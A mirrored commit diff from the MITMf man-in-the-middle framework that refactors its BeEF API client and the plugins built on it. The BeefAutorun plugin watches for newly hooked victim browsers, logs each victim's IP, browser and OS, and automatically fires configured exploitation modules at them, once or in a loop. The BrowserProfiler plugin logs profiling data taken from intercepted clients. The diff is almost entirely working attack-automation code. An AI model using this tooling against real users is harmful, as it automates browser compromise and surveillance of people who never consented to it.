mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-08 05:51:48 -07:00
revamped beefapi, fixed BrowserProfiler output
This commit is contained in:
parent
f05e132813
commit
ff235e3e90
4 changed files with 111 additions and 92 deletions
|
@ -1,6 +1,7 @@
|
||||||
#Example config file for the BeefAutorun plugin
|
#Example config file for the BeefAutorun plugin
|
||||||
|
|
||||||
mode = oneshot #can be set to loop, or oneshot
|
mode = oneshot
|
||||||
|
#can be set to loop, or oneshot
|
||||||
|
|
||||||
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
|
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
|
||||||
#in oneshot mode the plugin will run modules only once per hooked browser
|
#in oneshot mode the plugin will run modules only once per hooked browser
|
||||||
|
|
155
libs/beefapi.py
155
libs/beefapi.py
|
@ -18,8 +18,7 @@ class BeefAPI:
|
||||||
self.log_url = self.url + "logs?token="
|
self.log_url = self.url + "logs?token="
|
||||||
|
|
||||||
def random_url(self):
|
def random_url(self):
|
||||||
url = "".join(sample(digits + lowercase, 8))
|
return "".join(sample(digits + lowercase, 8))
|
||||||
return url
|
|
||||||
|
|
||||||
def login(self, username, password):
|
def login(self, username, password):
|
||||||
try:
|
try:
|
||||||
|
@ -36,30 +35,67 @@ class BeefAPI:
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
print "beefapi ERROR: %s" % e
|
print "beefapi ERROR: %s" % e
|
||||||
|
|
||||||
def onlineSessions(self):
|
def sessions_online(self):
|
||||||
return self.get_sessions("online", "session")
|
return self.get_sessions("online", "session")
|
||||||
|
|
||||||
def offlineSessions(self):
|
def sessions_offline(self):
|
||||||
return self.get_sessions("offline", "session")
|
return self.get_sessions("offline", "session")
|
||||||
|
|
||||||
def onlineHosts(self):
|
def session2host(self, session):
|
||||||
|
return self.conversion(session, "ip")
|
||||||
|
|
||||||
|
def session2id(self, session):
|
||||||
|
return self.conversion(session, "id")
|
||||||
|
|
||||||
|
def hook_info(self, hook): #Returns parsed information on a session
|
||||||
|
session = self.conversion(hook, "session")
|
||||||
|
url = self.hookurl + self.token
|
||||||
|
r = requests.get(url).json()
|
||||||
|
|
||||||
|
try:
|
||||||
|
states = ["online", "offline"]
|
||||||
|
for state in states:
|
||||||
|
for v in r["hooked-browsers"][state].items():
|
||||||
|
if v[1]["session"] == session:
|
||||||
|
return v[1]
|
||||||
|
except IndexError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
def hook_info_all(self, hook):
|
||||||
|
session = self.conversion(hook, "session")
|
||||||
|
url = self.url + "hooks/%s?token=%s" % (session, self.token)
|
||||||
|
return requests.get(url).json()
|
||||||
|
|
||||||
|
def hook_logs(self, hook):
|
||||||
|
session = self.conversion(hook, "session")
|
||||||
|
url = self.url + "logs/%s?token=%s" % (session, self.token)
|
||||||
|
return requests.get(url).json()
|
||||||
|
|
||||||
|
def hosts_online(self):
|
||||||
return self.get_sessions("online", "ip")
|
return self.get_sessions("online", "ip")
|
||||||
|
|
||||||
def offlineHosts(self):
|
def hosts_offline(self):
|
||||||
return self.get_sessions("offline", "ip")
|
return self.get_sessions("offline", "ip")
|
||||||
|
|
||||||
def get_sessions(self, state, value):
|
def host2session(self, host):
|
||||||
try:
|
return self.conversion(host, "session")
|
||||||
hooks = []
|
|
||||||
r = requests.get(self.hookurl + self.token).json()
|
|
||||||
for v in r["hooked-browsers"][state].items():
|
|
||||||
hooks.append(v[1][value])
|
|
||||||
|
|
||||||
return hooks
|
def host2id(self, host):
|
||||||
except Exception, e:
|
return self.conversion(host, "id")
|
||||||
print "beefapi ERROR: %s" % e
|
|
||||||
|
|
||||||
def getModid(self, name): #Returns module id
|
def ids_online(self):
|
||||||
|
return self.get_sessions("online", "id")
|
||||||
|
|
||||||
|
def ids_offline(self):
|
||||||
|
return self.get_sessions("offline", "id")
|
||||||
|
|
||||||
|
def id2session(self, id):
|
||||||
|
return self.conversion(id, "session")
|
||||||
|
|
||||||
|
def id2host(self, id):
|
||||||
|
return self.conversion(id, "ip")
|
||||||
|
|
||||||
|
def module_id(self, name): #Returns module id
|
||||||
url = self.mod_url + self.token
|
url = self.mod_url + self.token
|
||||||
try:
|
try:
|
||||||
r = requests.get(url).json()
|
r = requests.get(url).json()
|
||||||
|
@ -69,7 +105,7 @@ class BeefAPI:
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
print "beefapi ERROR: %s" % e
|
print "beefapi ERROR: %s" % e
|
||||||
|
|
||||||
def getModname(self, id): #Returns module name
|
def module_name(self, id): #Returns module name
|
||||||
url = self.mod_url + self.token
|
url = self.mod_url + self.token
|
||||||
try:
|
try:
|
||||||
r = requests.get(url).json()
|
r = requests.get(url).json()
|
||||||
|
@ -79,47 +115,9 @@ class BeefAPI:
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
print "beefapi ERROR: %s" % e
|
print "beefapi ERROR: %s" % e
|
||||||
|
|
||||||
def host2session(self, ip): #IP => Session
|
def module_run(self, hook, mod_id, options={}): #Executes a module on a specified session
|
||||||
url = self.hookurl + self.token
|
|
||||||
try:
|
|
||||||
r = requests.get(url).json()
|
|
||||||
for v in r["hooked-browsers"]["online"].items():
|
|
||||||
if v[1]["ip"] == ip:
|
|
||||||
return v[1]["session"]
|
|
||||||
else:
|
|
||||||
session = None
|
|
||||||
|
|
||||||
if session is None:
|
|
||||||
for v in r["hooked-browsers"]["offline"].items():
|
|
||||||
if v[1]["ip"] == ip:
|
|
||||||
return v[1]["session"]
|
|
||||||
else:
|
|
||||||
return None
|
|
||||||
|
|
||||||
except Exception, e:
|
|
||||||
print "beefapi ERROR: %s" % e
|
|
||||||
|
|
||||||
def session2host(self, session): #Session => IP
|
|
||||||
url = self.hookurl + self.token
|
|
||||||
try:
|
|
||||||
r = requests.get(url).json()
|
|
||||||
for v in r["hooked-browsers"]["online"].items():
|
|
||||||
if v[1]["session"] == session:
|
|
||||||
return v[1]["ip"]
|
|
||||||
else:
|
|
||||||
ip = None
|
|
||||||
|
|
||||||
if ip is None:
|
|
||||||
for v in r["hooked-browsers"]["offline"].items():
|
|
||||||
if v[1]["session"] == session:
|
|
||||||
return v[1]["ip"]
|
|
||||||
else:
|
|
||||||
return None
|
|
||||||
except Exception, e:
|
|
||||||
print "beefapi ERROR: %s" % e
|
|
||||||
|
|
||||||
def runModule(self, session, mod_id, options={}): #Executes a module on a specified session
|
|
||||||
try:
|
try:
|
||||||
|
session = self.conversion(hook, "session")
|
||||||
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
|
headers = {"Content-Type": "application/json", "charset": "UTF-8"}
|
||||||
payload = json.dumps(options)
|
payload = json.dumps(options)
|
||||||
url = self.url + "modules/%s/%s?token=%s" % (session, mod_id, self.token)
|
url = self.url + "modules/%s/%s?token=%s" % (session, mod_id, self.token)
|
||||||
|
@ -127,24 +125,45 @@ class BeefAPI:
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
print "beefapi ERROR: %s" % e
|
print "beefapi ERROR: %s" % e
|
||||||
|
|
||||||
def moduleResult(self, session, mod_id, cmd_id):
|
def module_results(self, hook, mod_id, cmd_id):
|
||||||
|
session = self.conversion(hook, "session")
|
||||||
url = self.mod_url + "%s/%s/%s?token=%s" % (session, mod_id, cmd_id, self.token)
|
url = self.mod_url + "%s/%s/%s?token=%s" % (session, mod_id, cmd_id, self.token)
|
||||||
return requests.get(url).json()
|
return requests.get(url).json()
|
||||||
|
|
||||||
def sessionInfo(self, session): #Returns parsed information on a session
|
def modules_list(self):
|
||||||
url = self.url + "hooks/%s?token=%s" % (session, self.token)
|
return requests.get(self.mod_url + self.token).json()
|
||||||
|
|
||||||
|
def module_info(self, id):
|
||||||
|
url = self.url + "modules/%s?token=%s" % (id, self.token)
|
||||||
return requests.get(url).json()
|
return requests.get(url).json()
|
||||||
|
|
||||||
def logs(self):
|
def logs(self):
|
||||||
return requests.get(self.log_url + self.token).json()
|
return requests.get(self.log_url + self.token).json()
|
||||||
|
|
||||||
def sessionLogs(self, session):
|
def conversion(self, value, return_value): #Helper function for all conversion functions
|
||||||
url = self.url + "logs/%s?token=%s" % (session, self.token)
|
url = self.hookurl + self.token
|
||||||
return requests.get(url).json()
|
try:
|
||||||
|
r = requests.get(url).json()
|
||||||
|
states = ["online", "offline"]
|
||||||
|
for state in states:
|
||||||
|
for v in r["hooked-browsers"][state].items():
|
||||||
|
for r in v[1].values():
|
||||||
|
if str(value) == str(r):
|
||||||
|
return v[1][return_value]
|
||||||
|
|
||||||
def listModules(self):
|
except Exception, e:
|
||||||
return requests.get(self.mod_url + self.token).json()
|
print "beefapi ERROR: %s" % e
|
||||||
|
|
||||||
def moduleInfo(self, id):
|
except IndexError:
|
||||||
url = self.url + "modules/%s?token=%s" % (id, self.token)
|
pass
|
||||||
return requests.get(url).json()
|
|
||||||
|
def get_sessions(self, state, value): #Helper function
|
||||||
|
try:
|
||||||
|
hooks = []
|
||||||
|
r = requests.get(self.hookurl + self.token).json()
|
||||||
|
for v in r["hooked-browsers"][state].items():
|
||||||
|
hooks.append(v[1][value])
|
||||||
|
|
||||||
|
return hooks
|
||||||
|
except Exception, e:
|
||||||
|
print "beefapi ERROR: %s" % e
|
||||||
|
|
|
@ -37,54 +37,51 @@ class BeefAutorun(Plugin):
|
||||||
|
|
||||||
userconfig = ConfigObj(self.autoruncfg)
|
userconfig = ConfigObj(self.autoruncfg)
|
||||||
self.Mode = userconfig['mode']
|
self.Mode = userconfig['mode']
|
||||||
if self.Mode == 'oneshot':
|
|
||||||
print '[*] Setting mode to oneshot'
|
|
||||||
elif self.Mode == 'loop':
|
|
||||||
print '[*] Setting mode to loop'
|
|
||||||
else:
|
|
||||||
sys.exit("[-] Error: unrecognized mode set in config file")
|
|
||||||
|
|
||||||
self.All_modules = userconfig["ALL"]
|
self.All_modules = userconfig["ALL"]
|
||||||
self.Targeted_modules = userconfig["targets"]
|
self.Targeted_modules = userconfig["targets"]
|
||||||
|
|
||||||
print "[*] BeEFAutorun plugin online"
|
print "[*] BeEFAutorun plugin online => Mode: %s" % self.Mode
|
||||||
t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
|
t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
def autorun(self, beef):
|
def autorun(self, beef):
|
||||||
already_hooked = []
|
|
||||||
already_ran = []
|
already_ran = []
|
||||||
|
already_hooked = []
|
||||||
while True:
|
while True:
|
||||||
sessions = beef.onlineSessions()
|
sessions = beef.sessions_online()
|
||||||
if len(sessions) > 0:
|
if len(sessions) > 0:
|
||||||
for session in sessions:
|
for session in sessions:
|
||||||
session_ip = beef.session2host(session)
|
|
||||||
if session not in already_hooked:
|
if session not in already_hooked:
|
||||||
logging.info("%s >> joined the horde!" % session_ip)
|
info = beef.hook_info(session)
|
||||||
|
logging.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
|
||||||
already_hooked.append(session)
|
already_hooked.append(session)
|
||||||
|
|
||||||
if self.Mode == 'oneshot':
|
if self.Mode == 'oneshot':
|
||||||
if session not in already_ran:
|
if session not in already_ran:
|
||||||
self.execModules(session, session_ip, beef)
|
self.execModules(session, beef)
|
||||||
already_ran.append(session)
|
already_ran.append(session)
|
||||||
|
|
||||||
elif self.Mode == 'loop':
|
elif self.Mode == 'loop':
|
||||||
self.execModules(session, session_ip, beef)
|
self.execModules(session, beef)
|
||||||
sleep(10)
|
sleep(10)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
sleep(1)
|
sleep(1)
|
||||||
|
|
||||||
def execModules(self, session, session_ip, beef):
|
def execModules(self, session, beef):
|
||||||
session_browser = beef.sessionInfo(session)["BrowserName"]
|
session_info = beef.hook_info(session)
|
||||||
session_os = beef.sessionInfo(session)["OsName"]
|
session_ip = session_info['ip']
|
||||||
|
hook_browser = session_info['name']
|
||||||
|
hook_os = session_info['os']
|
||||||
|
|
||||||
if len(self.All_modules) > 0:
|
if len(self.All_modules) > 0:
|
||||||
logging.info("%s >> sending generic modules" % session_ip)
|
logging.info("%s >> sending generic modules" % session_ip)
|
||||||
for module, options in self.All_modules.items():
|
for module, options in self.All_modules.items():
|
||||||
mod_id = beef.getModid(module)
|
mod_id = beef.module_id(module)
|
||||||
resp = beef.runModule(session, mod_id, json.loads(options))
|
resp = beef.module_run(session, mod_id, json.loads(options))
|
||||||
if resp["success"] == 'true':
|
if resp["success"] == 'true':
|
||||||
logging.info('%s >> sent module %s' % (session_ip, mod_id))
|
logging.info('%s >> sent module %s' % (session_ip, mod_id))
|
||||||
else:
|
else:
|
||||||
|
@ -93,16 +90,16 @@ class BeefAutorun(Plugin):
|
||||||
|
|
||||||
logging.info("%s >> sending targeted modules" % session_ip)
|
logging.info("%s >> sending targeted modules" % session_ip)
|
||||||
for os in self.Targeted_modules:
|
for os in self.Targeted_modules:
|
||||||
if (os in session_os) or (os == session_os):
|
if (os in hook_os) or (os == hook_os):
|
||||||
browsers = self.Targeted_modules[os]
|
browsers = self.Targeted_modules[os]
|
||||||
if len(browsers) > 0:
|
if len(browsers) > 0:
|
||||||
for browser in browsers:
|
for browser in browsers:
|
||||||
if browser == session_browser:
|
if browser == hook_browser:
|
||||||
modules = self.Targeted_modules[os][browser]
|
modules = self.Targeted_modules[os][browser]
|
||||||
if len(modules) > 0:
|
if len(modules) > 0:
|
||||||
for module, options in modules.items():
|
for module, options in modules.items():
|
||||||
mod_id = beef.getModid(module)
|
mod_id = beef.module_id(module)
|
||||||
resp = beef.runModule(session, mod_id, json.loads(options))
|
resp = beef.module_run(session, mod_id, json.loads(options))
|
||||||
if resp["success"] == 'true':
|
if resp["success"] == 'true':
|
||||||
logging.info('%s >> sent module %s' % (session_ip, mod_id))
|
logging.info('%s >> sent module %s' % (session_ip, mod_id))
|
||||||
else:
|
else:
|
||||||
|
|
|
@ -29,8 +29,10 @@ class BrowserProfiler(Inject, Plugin):
|
||||||
if 'clientprfl' in request.uri:
|
if 'clientprfl' in request.uri:
|
||||||
self.dic_output = self.post2dict(request.postData)
|
self.dic_output = self.post2dict(request.postData)
|
||||||
self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client
|
self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client
|
||||||
|
if self.dic_output['plugin_list'] > 0:
|
||||||
|
self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',')
|
||||||
pretty_output = pformat(self.dic_output)
|
pretty_output = pformat(self.dic_output)
|
||||||
logging.warning("%s Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
|
logging.warning("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
|
||||||
|
|
||||||
def get_payload(self):
|
def get_payload(self):
|
||||||
payload = """<script type="text/javascript">
|
payload = """<script type="text/javascript">
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue